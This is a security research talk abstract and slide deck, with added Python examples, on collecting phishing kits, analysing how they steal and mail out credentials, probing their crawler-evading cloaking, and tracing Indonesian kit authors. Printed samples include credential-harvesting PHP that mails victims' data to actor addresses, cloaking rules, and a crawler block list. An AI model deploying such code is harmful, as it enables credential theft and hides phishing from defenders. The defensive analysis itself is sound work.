
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phishing Website and Actor

Phishing, an old and traditional attack, is still a thing. Hundreds of phishing websites are launched every day and they threaten people around the world. The Anti-Phishing Working Group (APWG) reports that it detected 150,000+ phishing websites in the 3rd quarter of 2018.

Sometimes phishing actors make OPSEC failures and, thanks to that, researchers can obtain a phishing kit (a kit used to deploy a phishing website). We have collected 18,000+ phishing kits based on OSINT and analyzed the mechanisms of phishing websites and the phishing actors themselves.

In this presentation, we will show the following findings:
- How to collect phishing kits based on OSINT data.
- Analysis of phishing actors: who develops a phishing kit, how it is distributed, etc., including a methodology to identify a phishing actor from information (email, username and signature) inside a phishing kit.
- An analysis of Indonesian phishing actors who target Asian countries, focusing on an actor named DevilScream/Z1Coder who develops the infamous phishing kit "16shop".

Finally, we will show countermeasures we have taken against phishing websites and actors.


  1. Catch Phish If You Can: A Case Study of Phishing Website and Actor. 2019.05.15, Hirokazu Kodera & Manabu Niseki. Copyright (c) 2019 NTT Corp. All Rights Reserved.
  2. Who Are We?
     • Manabu Niseki: Researcher, NTT Secure Platform Laboratories; NTT-CERT; FIRST TC Bali 2018 & Internet Week 2018 speaker
     • Hirokazu Kodera: Researcher, NTT Secure Platform Laboratories
  3. THE STATE OF PHISHING
  4. The State of Phishing
     • APWG stats: 785,920 phishing sites detected in 2018
     • Source: http://docs.apwg.org/reports/apwg_trends_report_q4_2018.pdf
  5. How can we take countermeasures?
  6. 知己知彼: Know yourself, know your enemy (Sun Tzu, The Art of War / 孫子兵法)
  7. HOW TO CATCH PHISHES
  8. How to Catch Phishes
     • Phishing kit: a kit used to deploy a phishing website.
     • Obtaining the phishing kit makes it possible to analyze the phishing website from its source, not just from its rendered page.
  9. How to Catch Phishes
     • Phishing actors make OPSEC failures, e.g. paypal-support.big[.]com[.]my
  10. How to Catch Phishes
     • Phishing kit collecting methods:
       1. Subscribing to feeds (OpenPhish, PhishTank) and generating our own feeds (Certificate Transparency logs, newly registered domains)
       2. Enumerating phishy URLs from those feeds
       3. Crawling the phishy URLs: an open directory on the phishing site lets us download the phishing kit
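The crawling step above, as an added example that is not the authors' tooling: given a phishy URL from a feed, walk up its directory path, test each level for an open directory listing, and collect the archive links the listing exposes. Network access is confined to http_get(); the sample listing, the example.com host and the PayPal-2019.zip file name are constructed for the example.

```python
"""Locate downloadable phishing kits behind a phishy URL (added example)."""
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

ARCHIVE_EXT = (".zip", ".rar", ".7z", ".tar.gz", ".tgz")

# Constructed sample of an Apache-style index page; no real site was fetched.
SAMPLE_LISTING = """<html><head><title>Index of /paypal</title></head><body>
<h1>Index of /paypal</h1><pre><a href="../">Parent Directory</a>
<a href="PayPal-2019.zip">PayPal-2019.zip</a>   2019-03-01 12:00  1.2M
<a href="index.php">index.php</a>                2019-03-01 12:00  4.0K
</pre></body></html>"""


def candidate_directories(url):
    """Directory URLs to try for /a/b/login.php: /a/b/, /a/, / (closest first)."""
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    if parts.path and not parts.path.endswith("/"):
        segments = segments[:-1]  # drop the file name (login.php, index.html, ...)
    dirs = []
    for depth in range(len(segments), -1, -1):
        path = "/" + "/".join(segments[:depth]) + ("/" if depth else "")
        dirs.append(f"{parts.scheme}://{parts.netloc}{path}")
    return dirs


class _ListingParser(HTMLParser):
    """Collect the <title> text and every href on the page."""

    def __init__(self):
        super().__init__()
        self.title, self.hrefs, self._in_title = "", [], False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def _parse(html):
    parser = _ListingParser()
    parser.feed(html)
    return parser


def is_open_directory(html):
    """Apache/nginx title their listings 'Index of', Python's http.server 'Directory listing for'."""
    title = _parse(html).title.strip().lower()
    return title.startswith("index of") or title.startswith("directory listing for")


def find_kit_archives(html, base_url):
    """Absolute URLs of archives exposed by an open directory listing ([] if not a listing)."""
    if not is_open_directory(html):
        return []
    return [urljoin(base_url, h) for h in _parse(html).hrefs if h.lower().endswith(ARCHIVE_EXT)]


def http_get(url, timeout=10):
    """Plain fetch; returns '' on any error so one dead host does not abort a run."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception:
        return ""


def collect_kits(phishy_url, fetch=http_get):
    """Walk up from the phishy URL and return every archive found in an open directory."""
    found = []
    for directory in candidate_directories(phishy_url):
        for archive in find_kit_archives(fetch(directory), directory):
            if archive not in found:
                found.append(archive)
    return found
```

Running collect_kits() against a live URL touches the phishing host directly, so route it through infrastructure you are prepared to have logged (and cloaked, see the later slides) by the actor; the fetch parameter exists so the same logic can be driven from a proxy or a cached crawl.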
  11. INSIDE PHISHING KITS: HOW TO STEAL CREDENTIALS
  12. Inside Phishing Kits
     • How do phishing kits steal credentials? Two major ways:
       • Writing the credentials to a local file on the web server hosting the kit.
       • Sending the credentials to the actor's email address.
  13. Inside Phishing Kits: writing credentials to lolo.txt (kit source screenshot)
  14. Inside Phishing Kits: sending credentials to myloginbox@protonmail.com (kit source screenshot)
  15. Inside Phishing Kits: stats of email providers abused by actors (bar chart, count per provider on a 0 to 4,000 scale): mail.ru, aol.com, zoho.com, protonmail.com, mail.com, outlook.com, hotmail.com, yandex.com, yahoo.com, gmail.com
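A static triage of an unpacked kit for the two exfiltration mechanisms on slides 12 to 15, as an added example (not the authors' code): it finds drop files opened for appending, mail() calls and the mailbox addresses they go to, and tallies the providers the way the bar chart does. The sample kit is constructed for the example; myloginbox@protonmail.com is the address shown on slide 14, the rezult.backup@gmail.com address and file names other than lolo.txt are made up.

```python
"""Static triage of an unpacked phishing kit: where do the credentials go? (added example)"""
import os
import re
import tempfile
from collections import Counter

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
# fopen("lolo.txt", "a") / fopen('result.txt', 'a+'): a drop file opened for append
FOPEN_APPEND_RE = re.compile(r"""fopen\s*\(\s*["']([^"']+)["']\s*,\s*["']a\+?["']""")
# file_put_contents("x.txt", ..., FILE_APPEND) is the other common spelling
FPC_APPEND_RE = re.compile(r"""file_put_contents\s*\(\s*["']([^"']+)["'][^;]*FILE_APPEND""")
MAIL_CALL_RE = re.compile(r"\bmail\s*\(")
SOURCE_EXT = (".php", ".phtml", ".inc", ".html", ".htm", ".js")

# Constructed sample kit modelled on the two mechanisms shown on the slides.
SAMPLE_KIT = {
    "index.php": '<?php header("Location: login.php"); ?>',
    "login.php": r"""<?php
$ip  = $_SERVER['REMOTE_ADDR'];
$msg = "Email: ".$_POST['email']."\nPass: ".$_POST['pass']."\nIP: ".$ip."\n";
$fp = fopen("lolo.txt", "a");
fwrite($fp, $msg);
fclose($fp);
$send  = "myloginbox@protonmail.com";
$send2 = "rezult.backup@gmail.com";
mail($send,  "Rezult | ".$ip, $msg);
mail($send2, "Rezult | ".$ip, $msg);
header("Location: https://www.paypal.com/");
?>""",
    "card.php": r"""<?php
file_put_contents("cc.txt", serialize($_POST), FILE_APPEND);
mail("rezult.backup@gmail.com", "CC | ".$_SERVER['REMOTE_ADDR'], print_r($_POST, true));
?>""",
}


def scan_php(source):
    """Exfiltration indicators in one source file."""
    return {
        "emails": sorted(set(EMAIL_RE.findall(source))),
        "drop_files": sorted(set(FOPEN_APPEND_RE.findall(source) + FPC_APPEND_RE.findall(source))),
        "sends_mail": bool(MAIL_CALL_RE.search(source)),
    }


def scan_kit(root):
    """Walk an unpacked kit directory and merge the per-file indicators."""
    report = {"emails": set(), "drop_files": set(), "mail_files": []}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(SOURCE_EXT):
                continue  # skip captured lolo.txt-style logs: those hold victims, not actors
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hit = scan_php(fh.read())
            report["emails"].update(hit["emails"])
            report["drop_files"].update(hit["drop_files"])
            if hit["sends_mail"]:
                report["mail_files"].append(os.path.relpath(path, root))
    report["emails"] = sorted(report["emails"])
    report["drop_files"] = sorted(report["drop_files"])
    report["mail_files"].sort()
    return report


def provider_stats(emails):
    """Per-domain tally of the actor mailboxes, the figure behind the slide's bar chart."""
    return Counter(e.rsplit("@", 1)[1].lower() for e in emails)


def scan_sample_kit():
    """Write the constructed sample kit to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, source in SAMPLE_KIT.items():
            with open(os.path.join(tmp, name), "w", encoding="utf-8") as fh:
                fh.write(source)
        return scan_kit(tmp)
```

Run scan_kit() over every kit in the collection and feed provider_stats() the union of the addresses; the drop_files list is also what to request from the hosting provider when reporting, since those files usually still sit next to the kit.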
  16. INSIDE PHISHING KITS: HOW TO CLOAK
  17. Cloaking Function of Phishing Kits
     • Some phishing sites include a cloaking function, implemented with .htaccess and PHP.
     • Cloaking targets: IP address, User-Agent, HTTP Referer.
     • A normal user can access the phishing site, while a crawler cannot.
  18. Cloaking Function of Phishing Kits: implementation examples with .htaccess and PHP
     • .htaccess, Referer-based: a request whose Referer matches example.com or www.example.com is denied (403 Forbidden).

         RewriteEngine on
         RewriteCond %{HTTP_REFERER} example\.com [NC,OR]
         RewriteCond %{HTTP_REFERER} www\.example\.com
         RewriteRule ^.* - [F,L]

     • .htaccess, IP/host-based: the listed networks and hostnames, and requests carrying the environment variable "stealthed" (set elsewhere, e.g. by SetEnvIf), are denied; everyone else is allowed.

         RewriteEngine on
         order allow,deny
         deny from 192.0.2.0/24
         deny from 198.51.100.0/24
         deny from example.com
         deny from env=stealthed
         allow from all

     • PHP, User-Agent-based: a request whose User-Agent contains "crawler" or "bot" gets a 404 Not Found.

         <?php
         $ua = $_SERVER['HTTP_USER_AGENT'];
         // strpos() returns 0 (falsy) when the needle is at offset 0, so compare with !== false
         if (strpos($ua, 'crawler') !== false or strpos($ua, 'bot') !== false) {
             header('HTTP/1.0 404 Not Found');
             exit;
         }
         ?>

  19. Dynamic Analysis Against Phishing Kits
     • How to analyze the cloaking function in a phishing kit:
       1. Deploy the phishing kit on a web server in a closed (isolated) environment.
       2. Send HTTP requests with multiple header conditions (User-Agent, Referer) to the deployed kit.
       3. Observe the HTTP responses, e.g. User-Agent: testbot gets HTTP/1.1 200 OK, User-Agent: Bot gets HTTP/1.1 403 Forbidden.
  20. Dynamic Analysis Against Phishing Kits
     • About 12.9% of phishing kits have a cloaking function against User-Agent or Referer.
       • Analyzed phishing kits: 4,917
       • With a cloaking function: 636 (12.9%)
       • Without a cloaking function: 4,281 (87.1%)
     • Cloaking behaviour when triggered: respond with "403 Forbidden" or "404 Not Found", redirect to a search engine, or redirect to the legitimate site of the phishing target.
     • Summary of redirections to search engines and legitimate sites:

         Redirect destination   Phishing target
         google.com             Dropbox, Apple
         yahoo.com              PayPal
         www.linkedin.com       LinkedIn
         www.paypal.com         PayPal
         www.gov.uk             UK Revenue Customs Agency
         www.asb.co.nz          ASB Bank

  21. Dynamic Analysis Against Phishing Kits
     • Whether a phishing kit has a cloaking function can be identified by sending 13 patterns of HTTP request.
     • Of the 636 phishing kits that include a cloaking function, 86.6% block a request with the "Surfbot" User-Agent.
     • The result indicates a connection between phishing actors: the cloaking technique (the same block list) is probably shared among them.
     • The 13 HTTP header patterns:
        1. User-Agent: Surfbot
        2. Referer: spamcop.net
        3. User-Agent: imo-google-robot-intelink
        4. User-Agent: AdsBot-Google
        5. Referer: http://safebrowsing-cache.google.com/
        6. User-Agent: ASPSeek
        7. User-Agent: HSFT - LVU Scanner
        8. Referer: altavista.com
        9. Referer: google.com.ar
       10. User-Agent: CoolBot
       11. User-Agent: DISCo Pump 3.2
       12. User-Agent: NetZip Downloader
       13. User-Agent: tor-exit
  22. Phishing Sites Including Cloaking Function
     • How to check whether a live phishing site has a cloaking function:
       1. Access the phishing site with each of the 13 HTTP header patterns from the previous step.
       2. Observe the HTTP responses from the phishing site.
     • Example: Phishing Site A answers GET http://example.jp/phishing.php with User-Agent: Surfbot with HTTP/1.1 403 Forbidden, so it has a cloaking function. Phishing Site B answers GET http://example.com/fake.php with HTTP/1.1 200 OK for User-Agent: Surfbot, for Referer: spamcop.net and for User-Agent: tor-exit, so it does not.
  23. Phishing Sites Including Cloaking Function
     • 10.4% of live phishing sites have a cloaking function (89.6% do not).
     • Number of phishing site URLs accessed: 4,901
     • This is lower than the 12.9% seen in kits: some live phishing sites do not deny access even though the same kit has a cloaking function (User-Agent: testbot gets 403 Forbidden from the kit in the closed environment but 200 OK from the live site), presumably because the access control implemented with .htaccess is not enabled on that server.
  24. Characteristic Cloaking Function
     • Some phishing kits have a cloaking function that makes analysis harder: the IP address of each visitor is added to the .htaccess file dynamically.
     • Access the same phishing site again from that IP and the second access is redirected to the legitimate site (e.g. to PayPal).
     • Researchers need to account for this cloaking function: the first request from a given IP is the only one that sees the phishing page.
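The dynamic analysis of slides 19 to 22, as an added example that is not the authors' analysis tool: probe() sends a browser-like baseline and then the 13 header patterns, classifying each answer as "blocked" (403/404), "redirect:<Location>" or "allowed". Because of the .htaccess-writing kits described on slide 24, the baseline is sent twice before any pattern: if the second answer differs, the site has already keyed on the probing IP and header probing from that IP is abandoned. start_fake_kit() is a local stand-in for a kit deployed in the closed environment (the slide's PHP User-Agent rule plus a spamcop.net Referer deny, ported to Python); its rules and the fake.php path are constructed for the example.

```python
"""Dynamic cloaking probe with the deck's 13 header patterns (added example)."""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

PATTERNS = [  # (header, value), in the deck's order
    ("User-Agent", "Surfbot"),
    ("Referer", "spamcop.net"),
    ("User-Agent", "imo-google-robot-intelink"),
    ("User-Agent", "AdsBot-Google"),
    ("Referer", "http://safebrowsing-cache.google.com/"),
    ("User-Agent", "ASPSeek"),
    ("User-Agent", "HSFT - LVU Scanner"),
    ("Referer", "altavista.com"),
    ("Referer", "google.com.ar"),
    ("User-Agent", "CoolBot"),
    ("User-Agent", "DISCo Pump 3.2"),
    ("User-Agent", "NetZip Downloader"),
    ("User-Agent", "tor-exit"),
]
BASELINE_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface the 3xx as an HTTPError instead of following it


_opener = urllib.request.build_opener(_NoRedirect)


def http_fetch(url, headers, timeout=10):
    """Return (status, Location header or None) for one request."""
    try:
        with _opener.open(urllib.request.Request(url, headers=headers), timeout=timeout) as resp:
            return resp.status, None
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")


def classify(status, location):
    if status in (403, 404):
        return "blocked"
    if 300 <= status < 400:
        return "redirect:" + (location or "")
    return "allowed"


def probe(url, fetch=http_fetch):
    """Send a browser-like baseline, then each pattern layered on top of it."""
    base_headers = {"User-Agent": BASELINE_UA}
    baseline = classify(*fetch(url, base_headers))
    # A kit that appends each visitor IP to .htaccess answers differently on the
    # second hit; header probing from this IP is then meaningless, so stop here.
    if classify(*fetch(url, base_headers)) != baseline:
        return {"baseline": baseline, "results": {}, "cloaked_count": 0,
                "has_cloaking": True, "ip_cloaking": True}
    results = {}
    for header, value in PATTERNS:
        results[(header, value)] = classify(*fetch(url, {**base_headers, header: value}))
    cloaked = sum(1 for v in results.values() if v != "allowed")
    return {"baseline": baseline, "results": results, "cloaked_count": cloaked,
            "has_cloaking": baseline == "allowed" and cloaked > 0, "ip_cloaking": False}


class _FakeKit(BaseHTTPRequestHandler):
    """Stand-in kit: UA containing 'bot' or 'crawler' gets 404 (the slide's PHP
    rule); Referer containing spamcop.net gets 403 (an .htaccess-style deny)."""

    def do_GET(self):
        ua = self.headers.get("User-Agent", "").lower()
        if "bot" in ua or "crawler" in ua:
            return self._reply(404, b"")
        if "spamcop.net" in self.headers.get("Referer", ""):
            return self._reply(403, b"")
        self._reply(200, b"<html><title>Log in to your PayPal account</title></html>")

    def _reply(self, status, body):
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the console quiet
        pass


def start_fake_kit():
    """Serve the stand-in kit on a free loopback port; returns its base URL."""
    server = HTTPServer(("127.0.0.1", 0), _FakeKit)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_address[1]}"
```

Against a real site, probe(url) makes 15 requests from one source address, all of which the actor can log; for the kits on slide 24 only the very first request is trustworthy, which is why the second baseline fetch decides whether the 13 patterns are worth sending at all. A redirect verdict carries the Location target, so the "redirect to legitimate site" table on slide 20 can be rebuilt from a batch of probe results.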
  25. WHO DID IT?
  26. Signature / Credits Analysis: Th3 Exploiter (signature found in a kit)
  27. Signature / Credits Analysis: Ak47-VbV (signature found in a kit)
  28. Signature / Credits Analysis: Shadow Z118 (signature found in a kit)
  29. Signature / Credits Analysis
     • Signature / credits analysis makes it possible to trace phishing actors.
     • OSINT techniques:
       • Username check: Check User Names, Knowem, Pipl
       • Domain and IP research: RiskIQ, SecurityTrails, VirusTotal
       • Googling
  30. Chasing Indonesian Actors
     • Indonesian phishing actors:
       • RSJKINGDOM (a.k.a. DarkLight)
       • DevilScream (a.k.a. Z1coder)
       • Spammer ID
       • Others: Hijaiyh (a.k.a. justalinko), IDHAAM69, Indonesian Darknet and more.
  31. CHASING INDONESIAN ACTORS: RSJKINGDOM
  32. RSJKINGDOM: a developer of phishing kits targeting PayPal & Apple
  33. RSJKINGDOM (a.k.a. DarkLight): profile screenshots
  34. RSJKINGDOM (screenshot)
  35. RSJKINGDOM (screenshot)
  36. RSJKINGDOM (screenshot)
  37. CHASING INDONESIAN ACTORS: DEVILSCREAM
  38. DevilScream: a developer of the infamous phishing kit "16shop"
  39. DevilScream: handles linked to the actor: Riswanda, devilscream, Z1coder
  40. DevilScream: 768 domains in total (2019/03)
  41. DevilScream: GitHub used as a C2 (since 16shop v2)
  42. DevilScream: attribution by Phishing AI. Source: https://twitter.com/PhishingAi/status/1011688773610979328/
  43. CHASING INDONESIAN ACTORS: SPAMMER ID
  44. Spammer ID: RSJKINGDOM's profile picture on Kongknow
  45. Spammer ID (screenshot)
  46. Spammer ID runs various services:
     • arakatestore[.]com: HTML to PDF converter; encrypt text with HTML hidden characters
     • carder[.]io: BIN checker
     • spmr[.]us: URL shortener
     • spammer[.]me: OCR reader, "Priv8" tools, etc.
  47. COUNTERMEASURES WE'VE TAKEN
  48. Countermeasures We've Taken
     • Reporting phishing websites to Google Safe Browsing and to hosting providers.
     • Sharing a report with LEAs & CSIRT/CERTs.
  49. CONCLUSIONS
  50. Conclusions
     • You can get phishing kits by leveraging OSINT.
     • The cloaking function in phishing kits makes analysis difficult, but you can bypass it by knowing how it works.
     • You can take practical countermeasures against phishing attacks by analyzing phishing kits.
  51. ANY QUESTIONS?
  52. References
     • DeepEnd Research: Indonesian Spam Communities. http://www.deependresearch.org/2018/09/indonesian-spam-communities.html
     • NetSecOps: Analysis of a phishing mail (a drone bought from Apple). http://netsecops.info/bought-a-drone-from-apple-really/
